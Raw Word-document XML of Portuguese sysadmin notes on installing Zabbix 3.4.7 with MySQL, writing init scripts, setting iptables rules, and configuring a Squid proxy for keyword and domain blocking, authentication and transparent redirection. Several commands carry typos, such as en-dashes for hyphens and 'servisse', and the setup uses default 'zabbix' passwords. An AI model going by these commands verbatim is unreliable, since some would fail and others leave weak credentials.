          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql -uzabbix -pzabbix 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 cat zabbix-3.4.7/database/mysql/images.sql | mysql -uzabbix -pzabbix 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210602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 cat zabbix-3.4.7/database/mysql/data.sql | mysql -uzabbix -pzabbix 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4.3. Compilando o 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cd zabbix-3.4.7/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./configure --enable-server --enable-agent --with-mysql --with-jabber=/usr --with-libcurl=/usr/bin/curl-config --with-ssh2 --with-openipmi --with-libxml2 --with-net-snmp &amp;&amp; echo "Compilado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make install &amp;&amp; echo "[Ok]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5. Configurando o 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5.1. Configurando Agent Zabbix</w:t>
      </w:r>
      <w:r w:rsidR="000F6997">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F6997">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F6997">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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OBS: Os arquivos de configuração do Zabbix ficam em /usr/local/etc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vi /usr/local/etc/zabbix_agentd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PidFile=/tmp/zabbix_agentd.pid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LogFile=/tmp/zabbix_agentd.log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LogFileSize=2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ebugLevel=3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rver=127.0.0.1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ListenPort=10050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Hostname=zabbixServer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00766CAC" w:rsidRPr="00766CAC" w:rsidRDefault="00642C48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[ informe o nome exato do host, do jeito que aparece no prompt de comandos antes dos símbolos “$”, “#” ]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Timeout=3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PidFile=\/tmp\/zabbix_agentd.pid/PidFile=\/tmp\/zabbix_agentd.pid/g' /usr/local/etc/zabbix_agentd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LogFileSize=1/LogFileSize=2/g' /usr/local/etc/zabbix_agentd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DebugLevel=3/DebugLevel=3/g' /usr/local/etc/zabbix_agentd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ListenPort=10050/ListenPort=10050/g' /usr/local/etc/zabbix_agentd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Hostname=Zabbix server/Hostname=zabbixServer/g' /usr/local/etc/zabbix_agentd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debian/zabbixServer/g' /etc/hostname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  <w:r w:rsidRPr="00766CAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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Timeout=3/Timeout=3/g' /usr/local/etc/zabbix_agentd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 Mudar hostname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hostnamectl set-hostname zabbixServer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5.2. Configurando Zabbix Server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vi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ListenPort=10051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LogFile=/tmp/zabbix_server.log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LogFileSize=2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PidFile=/tmp/zabbix_server.pid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BHost=localhost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BName=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BUser=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BPassword=senha do zabbix para acessar o banco de dados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tartIPMIPollers=1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tartDiscoverers=5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Timeout=3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FpingLocation=/usr/bin/fping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ListenPort=10051/ListenPort=10051/g'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LogFileSize=1/LogFileSize=2/g'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PidFile=\/tmp\/zabbix_server.pid/PidFile=\/tmp\/zabbix_server.pid/g'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DBHost=localhost/DBHost=localhost/g'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DBPassword=/DBPassword=zabbix/g' /usr/local/etc/zabbix_server.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00766CAC" w:rsidRPr="00766CAC" w:rsidRDefault="00FB3E63" w:rsidP="00FB3E63">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9313"/>
        </w:tabs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StartIPMIPollers=0/StartIPMIPollers=1/g'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StartDiscoverers=1/StartDiscoverers=5/g'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Timeout=4/Timeout=3/g'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d -i 's/# FpingLocation=\/usr\/sbin\/fping/FpingLocation=\/usr\/bin\/fping/g' /usr/local/etc/zabbix_server.conf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5.3. Copiando os arquivos de frontend do Zabbix para o diretório /var/www/html/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mkdir /var/www/html/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 cp -R /usr/src/zabbix-3.4.7/frontends/php/* /var/www/html/zabbix/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chown -R www-data:www-data /var/www/html/zabbix/</w:t>
      </w:r>
      <w:r w:rsidR="000C4F11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C4F11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000C4F11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//mudar proprietário e grupo para www-data, que é um usuário de sistema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5.4. Scripts de inicialização do Zabbix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* Colocando o Zabbix para iniciar automaticamente, no boot do sistema operacional, criando os scripts abaixo.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vi /etc/init.d/zabbix_server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!/bin/bash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Zabbix daemon start/stop script.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Written by Alexei Vladishev &lt;alexei.vladishev@zabbix.com&gt;.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NAME=zabbix_server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PATH=/bin:/usr/bin:/sbin:/usr/sbin:/home/zabbix/bin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AEMON=/usr/local/sbin/${NAME}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ESC="Zabbix server daemon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PID=/tmp/$NAME.pid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test -f $DAEMON || exit 0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t -e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case "$1" in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start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echo "Starting $DESC: $NAME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start-stop-daemon --oknodo --start --pidfile $PID \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ab/>
        <w:t>--exec $DAEMON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;;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stop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echo "Stopping $DESC: $NAME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start-stop-daemon --oknodo --stop --pidfile $PID \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ab/>
        <w:t>--exec $DAEMON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;;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restart|force-reload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$0 stop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sleep 3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$0 start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;;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*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N=/etc/init.d/$NAME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echo "Usage: $N {start|stop|restart|force-reload}" &gt;&amp;2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exit 1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;;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esac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exit 0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vi /etc/init.d/zabbix_agentd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!/bin/sh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Zabbix agent start/stop script.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Written by Alexei Vladishev &lt;alexei.vladishev@zabbix.com&gt;.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NAME=zabbix_agentd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PATH=/bin:/usr/bin:/sbin:/usr/sbin:/home/zabbix/bin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AEMON=/usr/local/sbin/${NAME}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DESC="Zabbix agent daemon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PID=/tmp/$NAME.pid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test -f $DAEMON || exit 0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set -e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case "$1" in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start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echo "Starting $DESC: $NAME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start-stop-daemon --oknodo --start --pidfile $PID \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ab/>
        <w:t>--exec $DAEMON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;;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stop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echo "Stopping $DESC: $NAME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start-stop-daemon --oknodo --stop --pidfile $PID \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ab/>
        <w:t>--exec $DAEMON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;;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restart|force-reload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$0 stop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sleep 3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$0 start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;;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*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N=/etc/init.d/$NAME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# echo "Usage: $N {start|stop|restart|force-reload}" &gt;&amp;2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echo "Usage: $N {start|stop|restart|force-reload}" &gt;&amp;2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exit 1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 xml:space="preserve">    ;;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esac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exit 0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#################################################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5.5. Tornando os arquivos executáveis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chmod +x /etc/init.d/zabbix_server /etc/init.d/zabbix_agentd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* Executando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/etc/init.d/zabbix_server start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/etc/init.d/zabbix_agentd start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5.6. Habilitando os scripts para serem executados quando o computador for ligado.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update-rc.d -f zabbix_server defaults</w:t>
      </w:r>
      <w:r w:rsidR="006F3C59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006F3C59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006F3C59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//habilitar os scripts para serem executados quando o servidor for statado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update-rc.d -f zabbix_agentd defaults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6F3C59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apt install rcconf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3C59" w:rsidRDefault="006F3C59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cconf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3C59" w:rsidRDefault="006F3C59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arcar com * os serviços do zabbix (usando barra de espaço)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3C59" w:rsidRDefault="006F3C59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tab </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3C59" w:rsidRPr="00766CAC" w:rsidRDefault="006F3C59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[ok] -&gt; enter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OBS: Marcar os dois serviços "zabbix"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####################################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6. Acessando a interface web do Zabbix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00766CAC" w:rsidRDefault="006F3C59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No browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3C59" w:rsidRDefault="006F3C59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ServerIP/zabbix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3C59" w:rsidRDefault="006F3C59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5B34AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tudo precisa estar OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B34AE" w:rsidRDefault="005B34AE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colocar senha: zabbix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B34AE" w:rsidRPr="00766CAC" w:rsidRDefault="005B34AE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(sempre clicar em next step e no final finish)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7. Limpando a instalação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00766CAC" w:rsidRP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766CAC" w:rsidRDefault="00766CAC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766CAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># rm -rf /usr/src/zabbix*</w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//arquivo tarball</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C572F" w:rsidRPr="00544E74" w:rsidRDefault="003C572F" w:rsidP="00766CAC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0C12E3" w:rsidRDefault="005B34AE" w:rsidP="00525769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8. Acessando o zabbix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B34AE" w:rsidRDefault="005B34AE" w:rsidP="00525769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user: admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B34AE" w:rsidRPr="005A09FF" w:rsidRDefault="005B34AE" w:rsidP="00525769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ssword: zabbix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C439C" w:rsidRPr="005A09FF" w:rsidRDefault="001C439C" w:rsidP="005A09FF"/>
    <w:p w:rsidR="00416418" w:rsidRDefault="00416418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416418">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>USO DO ZABBIX NA WEB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00416418" w:rsidRDefault="00343618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O MONITORAMENTO PELO ZABBIX PODE SER VIA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00343618" w:rsidRDefault="00343618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simples check (icmp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00343618" w:rsidRDefault="00343618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Agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00343618" w:rsidRDefault="00343618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* snmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5C03" w:rsidRDefault="00CF5C03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CF5C03" w:rsidRPr="00946841" w:rsidRDefault="00CF5C03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946841">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MONITORAR UM HOST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5C03" w:rsidRDefault="00CF5C03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onfigurar o IP do host para o mesmo que o da rede</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5C03" w:rsidRDefault="00CF5C03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dicionar o host no zabbix web</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5C03" w:rsidRDefault="00CF5C03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iar um template ou utilizar um existente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5C03" w:rsidRPr="00416418" w:rsidRDefault="00CF5C03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E4526C" w:rsidRPr="006E2401" w:rsidRDefault="00E4526C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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD023A" w:rsidRPr="006E2401" w:rsidRDefault="00E4526C" w:rsidP="006E2401">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left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EGURANÇA DE REDES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4526C" w:rsidRPr="006E2401" w:rsidRDefault="00E4526C" w:rsidP="006E2401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 xml:space="preserve">PERMITIR PING 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A OUTPUT -p icmp --icmp-type 8 -s 192.168.0.1/24 -d 192.168.0.2/24 -j ACCEPT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A INPUT -p icmp --icmp-type 0 -s 192.168.0.2/24 -d 192.168.0.1/24 -j ACCEPT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LIMPAR REGRAS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F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946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo2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BLOQUEAR/PERMITIR ACESSO ICMP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A INPUT -p icmp -j DROP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A INPUT -p icmp -j ACCEPT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VER AS POLÍTICAS DE REGRAS DO IPTABLES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t filter -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nat -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mangle -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POLÍTICA RESTRITIVA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P INPUT DROP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P OUTPUT DROP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iptables -P FORWARD DROP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E4526C" w:rsidRPr="006E2401" w:rsidRDefault="00E4526C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PROXY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quid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ontrole de log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ache na memória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Relatórios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Vantagens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 - São úteis na manutenção de dados para o log de</w:t>
      </w:r>
      <w:r w:rsidR="006725BB" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> informações sobre as conexões </w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aos serviços de Internet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 - São úteis na utilização de cache de informações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 - Podem realizar filtragem inteligente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 - Podem realizar autentificação em nível de usuário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 - Oferecem proteção automática para as implementações IP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Desvantagens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 - Podem necessitar de servidores diferentes para cada serviço</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4526C" w:rsidRPr="006E2401" w:rsidRDefault="00E4526C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 - Os serviços oferecidos por proxy ocasionam um certo atraso na utilização dos mesmos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006725BB" w:rsidRPr="006E2401" w:rsidRDefault="006725BB" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="708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6725BB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No servidor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-get install squid3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rquivo de configuração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[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port 3128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visible_hostname Tiffany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cl all src al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F1636D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access allow(ou</w:t>
      </w:r>
      <w:r w:rsidR="00E4526C" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> deny) al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]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quid3 -k reconfigure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6725BB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N</w:t>
      </w:r>
      <w:r w:rsidR="00E4526C" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o cliente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bra o navegador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ferramentas - opções da internet - conexões - configurações da LAN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C74DAE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LIMITAR O USO DE CERTAS PALAVRAS PARA NAVEGAÇÃO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criar o arquivo /etc/squid3/bloqueados/block.txt  -&gt; digitar dentro dele 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s palavras que devem ser bloqueadas em lista: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[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asa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omida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maps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]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digitar no /etc/squid/squid.conf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[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port 3128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visible_hostname Tiffany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 xml:space="preserve">acl proibido url_regex -i "/etc/squid3/bloqueados/block.txt" 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http_access deny proibido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cl all src al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access allow(ouy deny) al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]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quid3 -k reconfigure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C74DAE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PROIBIR ACESSO A SITES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/etc/squid/squid.conf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[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port 3128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visible_hostname Tiffany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acl proibido url_regex -i "/etc/squid3/bloqueados/block.txt" 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access deny proibido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 xml:space="preserve">acl bloqueados dstdomain clickjogos.com.br jogos360.com.br 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 xml:space="preserve">http_access deny bloqueados </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74DAE" w:rsidRPr="006E2401" w:rsidRDefault="00C74DAE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(ou acl proibidos dstdom_regex –i “/etc/squid/proibidos.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74DAE" w:rsidRPr="006E2401" w:rsidRDefault="00C74DAE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http_access deny proibidos)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1636D" w:rsidRPr="006E2401" w:rsidRDefault="00F1636D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(ou acl dominionegado dstdomain .br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1636D" w:rsidRPr="006E2401" w:rsidRDefault="00F1636D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http_access deny dominionegado)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cl all src al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access allow(ouy deny) all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E4526C" w:rsidRPr="006E2401" w:rsidRDefault="00E4526C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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74DAE" w:rsidRPr="006E2401" w:rsidRDefault="00C74DAE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quid3 -k reconfigure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E43563" w:rsidRPr="006E2401" w:rsidRDefault="00E43563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3563" w:rsidRPr="006E2401" w:rsidRDefault="00E43563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HABILITAR AUTENTIFICAÇÃO DE USUÁRIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E43563" w:rsidRPr="006E2401" w:rsidRDefault="00E43563" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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E43563" w:rsidRPr="006E2401" w:rsidRDefault="00E43563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/etc/squid/squid.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E43563" w:rsidRPr="006E2401" w:rsidRDefault="00E43563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[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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port 3128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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51228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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visible_hostname Tiffany</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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51228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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acl proibido url_regex -i "/etc/squid3/bloqueados/block.txt" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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access deny proibido</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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E43563" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7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a</w:t>
      </w:r>
      <w:r w:rsidR="00E43563" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uth_par</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>am basic realm Proxy_Tiffany</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E43563" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing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a</w:t>
      </w:r>
      <w:r w:rsidR="00E43563" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uth_par</w:t>
      </w:r>
      <w:r w:rsidR="00450AF2" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>am basic program /usr/lib/squid</w:t>
      </w:r>
      <w:r w:rsidR="00E43563" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/basic_ncsa_auth </w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E43563" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/etc/squid/squid_passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A57FC7" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7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acl autenticacao proxy_auth REQUIRED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A57FC7" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7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http_access allow autenticacao</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A57FC7" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7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cl all src all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A57FC7" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7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A57FC7" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7" w:rsidP="006E240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access allow(ouy deny) all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A57FC7" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="00A57FC7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 xml:space="preserve">Crie um arquivo vazio </w:t>
      </w:r>
      <w:r w:rsidR="0051228D" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para armazenar as senhas de usuários</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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touch</w:t>
      </w:r>
      <w:r w:rsidR="00450AF2" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/squid</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/squid_passwd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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51228D" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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Crie um novo usuário</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450AF2" w:rsidRPr="006E2401" w:rsidRDefault="0051228D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dduser jose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450AF2" w:rsidRPr="006E2401" w:rsidRDefault="00450AF2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450AF2" w:rsidRPr="006E2401" w:rsidRDefault="00450AF2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Adicionar uma senha para o usuário</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450AF2" w:rsidRPr="006E2401" w:rsidRDefault="00450AF2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passwd /etc/squid/squid_passwd jose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450AF2" w:rsidRPr="006E2401" w:rsidRDefault="00450AF2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450AF2" w:rsidRPr="006E2401" w:rsidRDefault="00450AF2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quid3 –k reconfigure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE53A5" w:rsidRPr="006E2401" w:rsidRDefault="00450AF2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squid –k reconfigure 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AE53A5" w:rsidRPr="006E2401" w:rsidRDefault="00AE53A5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HABILITAR CONFIGURAÇÃO AUTOMÁTICA DA PORTA DO NAVEGADOR DE INTERNET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/etc/squid/squid.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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[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http_port 3128 transparent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]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quid3 –k reconfigure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squid –k reconfigure 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iptables –t nat –A PREROUTING –i eth0 –p tcp </w:t>
      </w:r>
      <w:r w:rsidR="002D29B0" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dport 80 –j REDIRECT –to-port 3128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE53A5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#Se a máquina estiver instalada em outra máquina:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253F9B" w:rsidRPr="006E2401" w:rsidRDefault="00AE53A5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iptables –t nat –A PREROUTING –i eth0 –p tcp </w:t>
      </w:r>
      <w:r w:rsidR="002D29B0" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dport 80 –j REDIRECT –</w:t>
      </w:r>
      <w:r w:rsidR="004A2A45" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to-dest IP: 3128</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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253F9B" w:rsidRPr="006E2401" w:rsidRDefault="00253F9B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6E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GERAÇÃO DE RELATÓRIO DE ACESSO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apt install srg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/etc/squid/squid.conf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[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Cache_access_log /var/log/squid3/access.log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]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/sr.conf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[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Descomentar: output_dir “var/www/htmil/srg_resports/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]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rg /var/log/squid3/access.log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servisse squid3 restart</w:t>
      </w:r>
    </w:p>
